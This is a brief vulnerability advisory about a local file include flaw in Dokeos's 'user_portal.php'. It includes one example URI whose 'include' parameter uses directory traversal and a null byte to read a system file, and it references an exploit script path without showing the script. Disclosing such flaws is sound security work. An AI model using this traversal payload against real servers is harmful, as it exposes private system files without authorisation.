Dokeos 'user_portal.php' Local File Include Vulnerability

Dokeos 'user_portal.php' Local File Include Vulnerability

Attackers may exploit this vulnerability via a browser.

The following example URI is available:

http://www.example.com/[installdir]/user_portal.php?include=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00.ht

The following exploit code is available:

/data/vulnerabilities/exploits/30150.pl